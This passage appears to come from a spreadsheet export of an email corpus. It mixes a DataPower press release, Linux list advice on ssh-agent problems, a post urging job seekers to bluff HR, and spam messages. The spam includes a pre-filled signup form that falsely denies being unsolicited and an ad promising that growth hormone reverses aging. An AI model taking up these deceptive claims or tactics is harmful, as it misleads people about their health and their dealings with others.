 balancer, and it will inspect all traffic that passes and will identify 
 and process those packets that are XML, Kelly said.
 In addition to proxy mode, the device can also be used as an application
 co-processor. This deployment method gives administrators more granular 
 control over what data is inspected and the application server itself 
 controls the device.
 DataPower is not the only company chasing this emerging market. Startup 
 Sarvega, based in Burr Ridge, Ill., introduced the Sarvega XPE switch in
 May, and earlier this month Tarari, an Intel spin-off, launched with a 
 focus on content processing and acceleration.
 The DataPower device is now available, priced starting at $54,995. The 
 company has announced one customer to date and says the product is in 
 field trails at a number of other enterprises.
 ========================================================================
 =
 DataPower has been addressing enterprise networking needs since it was 
 founded in early 1999 by Eugene Kuznetsov, a technology visionary who 
 foresaw the adverse effects XML and other next generation protocols 
 would have on enterprise networks. Long before industry interest in XML 
 grew, Kuznetsov assembled a team of world-class M.I.T. engineers and 
 designed the industry's first solutions to address the unique 
 requirements for processing XML. The first such solution was a software 
 interpreter called DGXT. This software-based approach to XML processing 
 is still licensed by many companies for use in their own products today.
 Leveraging the detailed knowledge and customer experience gained from 
 developing software-based accelerators, Kuznetsov's team raised the bar 
 and designed a system for processing XML in purpose-built hardware. In 
 2001, DataPower's effort produced XML Generation Three (XG3), the 
 industry's fastest technology for XML processing, bar none.
 Today, XG3 technology powers the industry's first wire-speed XML 
 network devices, enabling secure, high-speed applications and XML Web 
 Services. While other companies are just now marketing first versions of
 products, DataPower is delivering its third generation of technology, 
 providing an immediate return on technology investments to 
 industry-leading customers and partners.
 DataPower's M.I.T. heritage is complemented by a management team that 
 brings decades of experience in the networking and computing industries,
 drawing veteran leaders from several successful companies including 
 Akamai, Argon, Cascade, Castle Networks, Sycamore and Wellfleet.
 ========================================================================
 =
 DataPower Technology Secures $9.5 Million in Funding
 Venrock Associates, Mobius Venture Capital and Seed Capital Back Pioneer
 in XML-Aware Networking for Web Services
 CAMBRIDGE, Mass. - July 8, 2002 - DataPower Technology, Inc., the 
 leading provider of XML-Aware network infrastructure, today announced 
 that it has secured $9.5 million in series B financing. Investors for 
 this round include Venrock Associates, Mobius Venture Capital and Seed 
 Capital Partners. Michael Tyrrell, of Venrock, Bill Burnham, of Mobius, 
 and Jeff Fagnan, of Seed Capital, have joined DataPowers Board of 
 Directors.
 DataPower will use this funding to accelerate development, marketing and
 sales of the companys breakthrough technology for XML-Aware networking.
 Founded in 1999, DataPower invented the worlds first intelligent XML 
 networkingdevices, capable of transforming XML traffic and transactions
 at the wire-speed enterprises need to effectively embrace Web services 
 and other XML-centric initiatives. DataPowers solutions are based on 
 its patent-pending XML Generation Three (XG3) technology.
 "Enterprises are adopting XML at rapid rate to facilitate inter-and 
 intra-company communications but their network infrastructure is ill 
 prepared to support the requirements of this new traffic type. 
 DataPowers XML-acceleration devices enable the wirespeed processing of 
 XML that is required to support next generation enterprise 
 applications," said Eugene Kuznetsov, CTO and founder of DataPower 
 Technology.
 "DataPower gives companies the ability to use XML thats critical to Web
 services projects without sacrificing an ounce of performance." A single
 DataPower acceleration engine delivers the processing power of 10 
 serversbreaking the performance bottleneck associated with XML 
 processing and delivering an extraordinary return on investment. In 
 addition, the DataPower platform provides enhanced XML security, 
 protection against XML-based denial-of-service attacks, connection of 
 e-business protocols for incompatible XML data streams, load balancing 
 between back-end servers and real-time statistics reports.
 "In the post-bubble economy, technology investment decisions require 
 laser-focused scrutiny. DataPowers patent-pending technology addresses 
 a very real and growing pain point for enterprises," said Michael 
 Tyrrell of Venrock Associates. "By turbo-charging their networks with 
 DataPowers unique XML-Aware networking technology, companies will be 
 free to adopt next generation Web services without encountering 
 performance and security pitfalls."
 "We looked long and hard for a company capable of addressing the rapidly
 growing problems surrounding XML message processing performance and 
 security," said Bill Burnham of Mobius Venture Capital. "DataPower is on
 their third generation of technology. Their patent pending XML 
 Generation Three (XG3)technology was quite simply the single most 
 compelling technology solution we have seen to date."
 "XML is not a nice-to-have, it is a must have for enterprises serious 
 about optimizing application efficiency. Since 1999, DataPower has been 
 developing solutions to facilitate enterprise use of XML and Web 
 services," said Jeff Fagnan of Seed Capital Partners. "DataPowers 
 XML-acceleration devices are a key requirement for enterprises that rely
 on XML for mission critical applications."
 About Venrock Associates
 Venrock Associates was founded as the venture capital arm of the 
 Rockefeller Family and continues a tradition of funding entrepreneurs 
 that now spans over seven decades. Laurance S. Rockefeller pioneered 
 early stage venture financing in the 1930s. With over 300 investments 
 over a span of more than 70 years, the firm has an established a track 
 record of identifying and supporting promising early stage, technology- 
 based enterprises. As one of most experienced venture firms in the 
 United States, Venrock maintains a tradition of collaboration with 
 talented entrepreneurs to establish successful, enduring companies. 
 Venrock's continuing goal is to create long-term value by assisting 
 entrepreneurs in building companies from the formative stages. Their 
 consistent focus on Information Technology and Life Sciences-related 
 opportunities provides a reservoir of knowledge and a network of 
 contacts that have proven to be a catalyst for the growth of developing 
 organizations. Venrock's investments have included CheckPoint Software, 
 USinternetworking, Caliper Technologies, Illumina, Niku, DoubleClick, 
 Media Metrix, 3COM, Intel, and Apple Computer. With offices in New York 
 City, Cambridge, MA, and Menlo Park, CA, Venrock is well positioned to 
 respond to opportunities in any locale. For more information on Venrock 
 Associates, please visit www.venrock.com
 About Mobius Venture Capital
 Mobius Venture Capital, formerly SOFTBANK Venture Capital, is a $2.5 
 billion U.S.-based private equity venture capital firm managed by an 
 unparalleled team of former CEOs and entrepreneurs, technology pioneers,
 senior executives from major technology corporations, and leaders from 
 the investment banking community. Mobius Venture Capital specializes 
 primarily in early-stage investments in the areas of: communications 
 systems software and services; infrastructure software and services; 
 professional services; enterprise applications; healthcare informatics; 
 consumer and small business applications; components; and emerging 
 technologies. Mobius Venture Capital combines its technology expertise 
 and broad financial assets with the industry's best entrepreneurs to 
 create a powerhouse portfolio of over 100 of the world's leading high 
 technology companies. Mobius Venture Capital can be contacted by 
 visiting their web site www.mobiusvc.com.
 About Seed Capital Partners
 Seed Capital Partners is an early-stage venture fund affiliated with 
 SoftBank Corporation, one of the world's leading Internet market forces.
 Seed Capital manages funds focused primarily on companies addressing 
 Internet-enabled business-to-business digital information technology 
 opportunities, which are located in the Northeastern U.S., the 
 southeastern region of the Province of Ontario, Canada, and Israel. Seed
 Capitals portfolio includes Spearhead Technologies, Concentric Visions 
 and CompanyDNA. For more information on Seed Capital Partners, please 
 visit www.seedcp.com.
 About DataPower Technology
 DataPower Technology provides enterprises with intelligent XML-Aware 
 network infrastructure to ensure unparalleled performance, security and 
 manageability of next-generation protocols. DataPowers patent-pending 
 XML Generation Three (XG3) technology powers the industrys first 
 wirespeed XML network devices, enabling secure, high-speed applications 
 and XML Web Services. Founded in 1999, DataPower is now delivering its 
 third generation of technology, providing immediate return on technology
 investments to industry-leading customers and partners. DataPower is 
 privately held and based in Cambridge, MA. Investors include Mobius 
 Venture Capital, Seed Capital Partners, and Venrock Associates.
 CONTACT:
 DataPower Technology, Inc.
 Kieran Taylor
 617-864-0455
 kieran@datapower.com
 Schwartz Communications
 John Moran/Heather Chichakly
 781-684-0770
 datapower@schwartz-pr.com
 ========================================================================
 Steve Kelly, chairman and CEO
 During over twenty years in the technology industry, Steve Kelly has 
 built and managed global enterprise networks, provided consulting 
 services to Fortune 50 businesses, and been involved in the launch of 
 several start-ups. Prior to DataPower, Kelly was an 
 entrepreneur-in-residence at Venrock Associates, and was co-founder of 
 Castle Networks, where he led the company's sales, service and marketing
 functions. Castle was acquired by Siemens AG in 1999 to create Unisphere
 Networks, which was subsequently purchased by Juniper Networks. Kelly 
 was an early contributor at Cascade Communications, where he built and 
 managed the company's core switching business; Cascade's annual revenues
 grew from $2 million to $300 million annually during Kelly's tenure. 
 Kelly also worked at Digital Equipment Corporation where he managed and 
 grew their corporate network to 50,000+ nodes in 28 countries, the 
 largest in the world at the time. Kelly has a B.S. in Information 
 Systems from Bentley College.
 Eugene Kuznetsov, founder, president and CTO
 Eugene Kuznetsov is a technology visionary that has been working to 
 address enterprise XML issues since the late 90s. Kuznetsov founded 
 DataPower Technology, Inc. in 1999 to provide enterprises with an 
 intelligent, XML-aware network infrastructure to support next-generation
 applications. Prior to starting DataPower, Kuznetsov led the Java JIT 
 Compiler effort for Microsoft Internet Explorer for Macintosh 4.0. He 
 was also part of the team which developed one of the first clean room 
 Java VM's. This high-speed runtime technology was licensed by some of 
 the industry's largest technology companies, including Apple Computer. 
 He has consulted to numerous companies and worked on a variety of 
 hardware and software engineering problems in the areas of memory 
 management, power electronics, optimized execution engines and 
 application integration. Kuznetsov holds a B.S. in electrical 
 engineering from MIT.
 Steve Willis, vice president of advanced technology
 Steve Willis is an accomplished entrepreneur and a pioneer in protocol 
 optimization. Prior to joining DataPower, Willis was co-founder and CTO 
 of Argon Networks, a provider of high-performance switching routers that
 was acquired by Siemens AG in 1999 to create Unisphere Networks; 
 Unisphere was subsequently purchased by Juniper Networks. Before Argon, 
 Steve was vice president of advanced technology at Bay Networks (now 
 Nortel Networks) where he led both IP and ATM-related technology 
 development and managed a group that generated 24 patent applications, 
 developed a 1 Mbps forwarding engine and led the specification of the 
 ATM Forum's PNNI routing protocol. Most notably, Steve was co-founder, 
 original software director and architect for Wellfleet Communications, a
 leading pioneer of multi-protocol routers. Wellfleet was rated as the 
 fastest growing company in the U.S. for two consecutive years by Fortune
 magazine. Willis is currently a member of the Institute of Electrical 
 and Electronics Engineers (IEEE) and the Internet Research Task Force 
 (IRTF) Routing Research Group. Willis has a B.D.I.C. in Computer Science
 from the University of Massachusetts.
 Bill Tao, vice president of engineering
 With a vast understanding of network optimization technologies and 
 extensive experience in LAN and WAN networking, Bill Tao brings over 25 
 years of critical knowledge to lead DataPower's engineering efforts. 
 Prior to DataPower, Tao was the vice president of engineering for 
 Sycamore Networks, developing a family of metro/regional optical network
 switches. He is also well acquainted with network optimization 
 techniques as he was previously vice president of engineering at 
 InfoLibria, where he led development and software quality assurance 
 engineering for a family of network caching products. Tao has held 
 senior engineering positions at NetEdge, Proteon, Codex and Wang. Tao 
 received a B.S. in Electrical Engineering from the University of 
 Connecticut and an M.S. in Computer Science from the University of 
 Illinois.
 Kieran Taylor, director of product marketing
 Kieran Taylor has an accomplished record as a marketing professional, 
 industry analyst and journalist. Prior to joining DataPower, Taylor was 
 the director of product management and marketing for Akamai Technologies
 (NASDAQ: AKAM). As an early contributor at Akamai, he helped develop the
 company's initial positioning and led the technical development and 
 go-to-market activities for Akamai's flagship EdgeSuite service. 
 Taylor's early contribution helped position the service provider to 
 secure a $12.6 billion IPO. He has also held senior marketing management
 positions at Nortel Networks, Inc. and Bay Networks. Taylor was 
 previously an analyst at TeleChoice, Inc. and the Wide Area Networks 
 editor for Data Communications, a McGraw Hill publication. Taylor holds 
 a B.A. in Print Journalism from the Pennsylvania State University School
 of Communications.
 =================================================================
 Board of Advisors
 Mark Hoover
 Mark Hoover is President and co-founder of Acuitive, Inc., a start-up 
 accelerator. With over 20 years experience in the networking industry, 
 Hoover's expertise spans product development, marketing, and business 
 development. Before launching Acuitive, Hoover worked at AT&amp;T Bell 
 Laboratories, AT&amp;T Computer Systems, SynOptics, and Bay Networks, where 
 he played a role in the development of key technologies, such as 
 10-BASET, routing, FDDI, ATM, Ethernet switching, firewall, Internet 
 traffic management, and edge WAN switch industries.
 George Kassabgi
 Currently Vice President of Engineering at BEA Systems, Mr. Kassabgi has
 held executive-level positions in engineering, sales and marketing, and 
 has spearheaded leading-edge developments in the application server 
 marketplace since 1996. He is widely known for his regular speaking 
 engagements at JavaOne, as well as columns and contributions in JavaPro,
 Java Developer's Journal and other publications. In addition to being a 
 venerated Java expert, George Kassabgi holds a patent on SmartObject 
 Technology, and authored the technical book Progress V8.
 Marshall T. Rose
 Marshall T. Rose runs his own firm, Dover Beach Consulting, Inc. He 
 formerly held the position of the Internet Engineering Task Force (IETF)
 Area Director for Network Management, one of a dozen individuals who 
 oversaw the Internet's standardization process. Rose is the author of 
 several professional texts on subjects such as Internet Management, 
 Electronic Mail, and Directory Services, which have been published in 
 four languages. He is well known for his implementations of core 
 Internet technologies (such as POP, SMTP, and SNMP) and OSI technologies
 (such as X.500 and FTAM). Rose received a PhD in Information and 
 Computer Science from the University of California, Irvine, in 1984.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Strange ssh problem
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Niall,
 Some thoughts...
 o Run the ssh client with verbosity 3 (ssh -v -v -v)
 o Run an sshd with debugging level three (sshd -d -d -d)
 o ~alfio doesn't seem to be nfs-mounted like ~alfred
 (The following aren't really applicable, but...
     o Has alfred been logged in for ages? Has the tmpsweeper swept
       through /tmp removing alfred's ssh-agent directory in its wake?
     o Is /tmp a+rwxt? Does /dev/null exist?
     o Has alfred been messing with his TMPDIR envar?
     o What does lsof on his ssh-agent say? What about on alfio's?
     o What are the permissions on ~alfred and ~alfred/.ssh?
     o Does alfred's uid conflict with somebody else's?
     o Does alfred's $SSH_AGENT_PID correspond to his agent? alfio's?
 )
 Wesley.
 On Thu, Aug 01, 2002 at 03:51:12PM +0100, Niall O Broin wrote:
 &gt; I have a strange problem with one user in a small network using ssh.
 &gt; Everyone in the network uses ssh and they run an ssh-agent on login. This
 &gt; works fine for conveniently wandering around the network and to some of our
 &gt; external boxes - or did, until today. Suddenly, when one user (alfred) tries
 &gt; to ssh anywhere he's asked for a password. He says He changed nothing (don't
 &gt; they all) but I do actually believe him. I used ssh-keygen to make new keys
 &gt; but that didn't help. 
 &gt; 
 &gt; I created a new user alfio into whose home directory I copied alfred's .ssh
 &gt; directory - alfio can wander around free as a bird without being asked for a
 &gt; password ever (except of course for the passphrase to load the identiy into
 &gt; the agent).
 &gt; 
 &gt; In case there was something else in Alfred' environment, I copied .??* from
 &gt; alfred's home directory to alfio's, remembering to change ownership
 &gt; afterwards. Still alfio is as free as a bird.
 &gt; 
 &gt; We use only SSH2 with DSA keys. An extract from a ssh -v for alfio is below
 &gt; 
 &gt; debug1: got SSH2_MSG_SERVICE_ACCEPT
 &gt; debug1: authentications that can continue: publickey,password
 &gt; debug1: next auth method to try is publickey
 &gt; debug1: userauth_pubkey_agent: testing agent key /home/alfio/.ssh/id_dsa
 &gt; debug1: input_userauth_pk_ok: pkalg ssh-dss blen 434 lastkey 0x80916f0 hint -1
 &gt; debug1: ssh-userauth2 successful: method publickey
 &gt; 
 &gt; and before starting this ssh attempt, ssh-add -l for alfio said:
 &gt; 
 &gt; 1024 07:4c:7c:90:0d:28:41:3a:95:c2:81:3d:ba:c4:3d:03 /home/alfio/.ssh/id_dsa (DSA)
 &gt; 
 &gt; whereas with alfred the same segment of the debug log went
 &gt; 
 &gt; debug1: got SSH2_MSG_SERVICE_ACCEPT
 &gt; debug1: authentications that can continue: publickey,password
 &gt; debug1: next auth method to try is publickey
 &gt; debug1: userauth_pubkey_agent: testing agent key /nfshome/alfred/.ssh/id_dsa
 &gt; debug1: authentications that can continue: publickey,password
 &gt; 
 &gt; and before starting this ssh attempt, ssh-add -l for alfred said:
 &gt; 
 &gt; 1024 07:4c:7c:90:0d:28:41:3a:95:c2:81:3d:ba:c4:3d:03 /home/alfred/.ssh/id_dsa (DSA)
 &gt; 
 &gt; 
 &gt; This problem is definitely related to alfred as a user - it happens when he
 &gt; logs in on differing workstations (all NFS mounting the same home
 &gt; directories) and the other users (including good old alfio) don't have any
 &gt; problems.
 &gt; 
 &gt; 
 &gt; Niall
 &gt; 
 &gt; -- 
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 &gt; List maintainer: listmaster@linux.ie
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "A" == Adam L Beberg &lt;beberg@mithral.com&gt; writes:
     A&gt; I'm not displeased you're trying to help, just frustrated that
     A&gt; employers can demand such rediculous combinations of skills
     A&gt; with insane years of experience.
 &gt;&gt;&gt;From my 25+ years in the playing field, IMHO the art of job-hunting
 (for those not yet de-jobbed) is the art of getting past the HR-stage
 interview and into the engineer-to-engineer interview.  HR is not
 being honest with you so there's no ethical quandry to be totally
 honest with them: If they want experience numbers that would place you
 in the OAK project, lead them to believe that you have "something
 roughly equivalent" (ie "it wasn't 5 years, but it was three intense
 years with plenty of overtime") -- they are playing a bluff in saying
 /they/ know the job requirements so you're perfectly within poker
 rules to bluff back to say you have it.
 If you /don't/ have the requisite Right Stuff, the engineers can
 usually suss it out pretty fast during the second interview.  Most
 often, their choice is based 90% on "who can I work with" and only
 maybe 10% on "how much/little will we have to tutor this candidate?"
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] spamc processes
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Aug 21, 2002 at 11:26:13AM -0500, brad angelcyk wrote:
 &gt; 
 &gt; 
 &gt; Hi,
 &gt; 
 &gt; I have been using SpamAssassin for a few weeks, and I have noticed that
 &gt; the speed of scanning of email has drastically reduced since we switched
 &gt; to it.  My configuration is Sendmail 8.12.3 with SA 2.31 (using the
 &gt; spamass-milter sendmail milter).  There are 125 spamc processes running
 &gt; right now, and there were about 109 an hour ago.  They don't seem to be
 &gt; clearing up.  Does anybody have any information on what I can do?
 &gt; 
 &gt; Thanks,
 &gt; Brad
 &gt; 
 the check_local tarball includes a program called miltrassassin.
 It's a C Milter program speaking the SPAMD protocol so it will be
 far more efficient than spamass-milter.
 Check http://www.digitalanswers.org/check_local/miltrassassin.html
 for some details about miltrassassin.                                                                                                                                                                     
 The check_local tarball can be downloaded on
 http://www.digitalanswers.org/check_local/beta.html
 Another alternative solution is to use Mimedefang : it offers
 anti-spam, attachment defanging, custom filtering.
 regards, 
 SL/
 ---
 Stephane Lentz / Alcanet International - Internet Services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</si>
  <si>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.Message report from your contact page....//ytu855 rkq
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;Check the REPORTS you would like to receive&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;style&gt;
 A{color:navy; text-decoration:none; font-weight:bold; font-family:arial,helvetica,sans-serif}
 A:hover{color:red; text-decoration:none; font-weight:bold; font-family:arial,helvetica,sans-serif}
 A:active{color:ffcc00; text-decoration:none; font-weight:bold; font-family:arial,helvetica,sans-serif}
 A:visited{color:ffcc00; text-decoration:none; font-weight:bold; font-family:arial,helvetica,sans-serif}
 BODY{color:black; font-family:verdana}
 TD{font-family:arial,helvetica,sans-serif}
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#C0C0C0" text="#003366"&gt;
 &lt;div align="center"&gt;&lt;center&gt;
 &lt;form action="http://www.redlightemail.com/submitsignup.cfm" method="post" name="test" id="test" target="_blank"&gt;
 	&lt;input type="hidden" name="companyid" value="28824"&gt;
 	&lt;input type="hidden" name="gatherer" value="BigEmail200910"&gt;
 	&lt;input type="hidden" name="sitename" value=""&gt;
 	&lt;input type="hidden" name="owner" value=""&gt;
 	&lt;input type="hidden" name="nexturl" value="http://www.redlightemail.com/thankyou.cfm?exitconsole=no"&gt;
 	&lt;input type="hidden" name="backurl" value=""&gt;
 	&lt;table border=0 cellpadding=0 width=451 height="1536"&gt;
 		&lt;tr&gt;
 			&lt;td colspan="2" height="91" width="445"&gt;
                 &lt;b&gt;&lt;font color="#003366" size="3"&gt;Check the Available REPORTS you would like to receive:&lt;/font&gt;&lt;/b&gt;
 				&lt;hr width="100%"&gt;
                 &lt;font size="2" color="#8B0000"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;Keep on TOP of the latest NEWS, Get
                 Great Special DEALS now...
 				&lt;br&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;It is complimentary,&lt;b&gt; it costs nothing&lt;/b&gt;, YOU can QUIT anytime !&lt;/font&gt;
 				&lt;hr width="100%"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="darkred" colspan="2" align="center" height="24" width="445"&gt;
 				&lt;font size="4" color="ffffff"&gt;&lt;strong&gt;Financial - Stocks - Loans - Mortgage&lt;/strong&gt;&lt;/font&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td width="18" align="left" height="20"&gt;
 				&lt;INPUT TYPE="Checkbox" NAME="list0201" VALUE="yes"&gt;
 			&lt;/td&gt;
 			&lt;td width="423" align="left" height="20"&gt;
 				Financial news &amp; Stock market
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td width="18" align="left" height="20"&gt;
 				&lt;INPUT TYPE="Checkbox" NAME="list0202" VALUE="yes"&gt;
 			&lt;/td&gt;
 			&lt;td width="423" align="left" height="20"&gt;
                 Government &amp; Politics / discussions
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td width="18" align="left" height="20"&gt;
 			&lt;INPUT TYPE="Checkbox" NAME="list0203" VALUE="yes"&gt;
 			&lt;/td&gt;
 			&lt;td width="423" align="left" height="20"&gt;
 				Credit Cards &amp;  Mortgage Refinancing / Loans
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="darkred" colspan="2" align="center" height="24" width="445"&gt;
 				&lt;font size="4" color="white"&gt;&lt;strong&gt;Health - Fitness - Holidays - Travel&lt;/strong&gt;&lt;/font&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td width="18" align="left" height="20"&gt;
 				&lt;INPUT TYPE="Checkbox" NAME="list0101" VALUE="yes"&gt;
 			&lt;/td&gt;
 			&lt;td width="423" align="left" height="20"&gt;
 				Online Pharmacies Discounts &amp; Specials
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td width="18" align="left" height="20"&gt;
 				&lt;INPUT TYPE="Checkbox" NAME="list0102" VALUE="yes"&gt;
 			&lt;/td&gt;
 			&lt;td width="423" align="left" height="20"&gt;
 				General Health &amp; Fitness Tips /  Secrets
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td width="18" align="left" height="20"&gt;
 				&lt;INPUT TYPE="Checkbox" NAME="list0103" VALUE="yes"&gt;
 			&lt;/td&gt;
 			&lt;td width="423" align="left" height="20"&gt;
 				Alternative medicine &amp; Health care
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td width="18" align="left" height="20"&gt;
 				&lt;INPUT TYPE="Checkbox" NAME="list0104" VALUE="yes"&gt;
 			&lt;/td&gt;
 			&lt;td width="423" align="left" height="20"&gt;
                 Under booked Vacations &amp; Special travel discounts
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="darkred" colspan="2" align="center" height="24" width="445"&gt;
                 &lt;font size="4" color="white"&gt;&lt;strong&gt;Mature Intrests&amp;nbsp; - Dating&lt;/strong&gt;&lt;/font&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td width="18" align="left" height="20"&gt;
 				&lt;INPUT TYPE="Checkbox" NAME="list0001" VALUE="yes" CHECKED &gt;
 			&lt;/td&gt;
 			&lt;td width="423" align="left" height="20"&gt;
 				General Interest
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td width="18" align="left" height="20"&gt;
 				&lt;INPUT TYPE="Checkbox" NAME="list0002" VALUE="yes"&gt;
 			&lt;/td&gt;
 			&lt;td width="423" align="left" height="20"&gt;
 				AdultWebmasters - General
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td width="18" align="left" height="20"&gt;
 				&lt;INPUT TYPE="Checkbox" NAME="list0003" VALUE="yes"&gt;
 			&lt;/td&gt;
 			&lt;td width="423" align="left" height="20"&gt;
 				AdultWebmasters - Unrestricted sites
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td width="18" align="left" height="20"&gt;
 				&lt;INPUT TYPE="Checkbox" NAME="list0006" VALUE="yes"&gt;
 			&lt;/td&gt;
 			&lt;td width="423" align="left" height="20"&gt;
 				AdultWebmasters - Content buyers
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td width="18" align="left" height="21"&gt;
 				&lt;INPUT TYPE="Checkbox" NAME="list0009" VALUE="yes"&gt;
 			&lt;/td&gt;
 			&lt;td width="423" align="left" height="21"&gt;
                 Cassino's &amp; Online Gamblinng
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td width="18" align="left" height="20"&gt;
 				&lt;INPUT TYPE="Checkbox" NAME="list0010" VALUE="yes"&gt;
 			&lt;/td&gt;
 			&lt;td width="423" align="left" height="20"&gt;
 				Dating Services &amp;&amp;nbsp; Personal Ads
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;	
 			&lt;td width="18" align="left" height="20"&gt;
 				&lt;INPUT TYPE="Checkbox" NAME="sendpictures" VALUE="yes" CHECKED &gt;
 			&lt;/td&gt;
 			&lt;td width="423" align="left" height="20"&gt;
 				Send Me 10 Uncensored Pictures Daily !
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan="2" height="20" width="445"&gt;
 				&lt;input type="hidden" name="name" value=""&gt;
 				&lt;input type="hidden" name="email" value="webmaster@efi.ie"&gt;
 				&lt;input type="hidden" name="gender" value="Male"&gt;
 				&lt;input type="hidden" name="preference" value="Straight"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan="2" align="center" height="81" width="445"&gt;
 				&lt;br&gt;
 				&lt;input type="submit" name="action" value="PLEASE SEND ME THE REPORTS NOW !" style="background-color: #C0C0C0; border-style: outset; border-width: 6"&gt;&lt;br&gt;
 				&lt;br&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan="2" height="949" width="445"&gt;
 				&lt;hr width="430" size="1"&gt;	
 				&lt;center&gt;&lt;font face="Verdana" size="1"&gt;This mail is NEVER sent unsolicited, Got it by error ?&lt;br&gt;[ &lt;A target=_blank href="http://www.redlightemail.com/remove.cfm?webmaster@efi.ie"&gt;CLICK HERE&lt;/a&gt; ] to be removed from our subscribers List !&lt;/font&gt;&lt;/center&gt;
 				&lt;hr width="430" size="1"&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;/FORM&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ndtxcpfjspwwtrkaxnxg
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Memory loss?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multipart message in MIME format.
 --9EE6957817154900AA7494F2E1F329BE
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 w3498 98sd0f89 498w90
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Lose weight while building lean muscle mass&amp;nbsp; and reversing the
 ravages of aging all at once&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align=3D"left"&gt;&lt;left&gt;
 &lt;table border=3D"0" width=3D"650"&gt;
 &lt;tr&gt;
 &lt;td height=3D"20"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align=3D"right"&gt;
   &lt;table border=3D"1" width=3D"540" bgcolor=3D"#cccccc"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" bgcolor=3D"#0000FF"&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"4" color=3D"#F=
 FFFFF"&gt;Human
         Growth Hormone Therapy&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"4" color=3D"#F=
 FFFFF"&gt;Lose weight while
         building lean muscle mass&lt;br&gt;
         &amp;nbsp;and reversing the ravages of aging all at once.&lt;/font&gt;&lt;font =
 face=3D"Arial" size=3D"3" color=3D"#FFFFFF"&gt;&lt;br&gt;
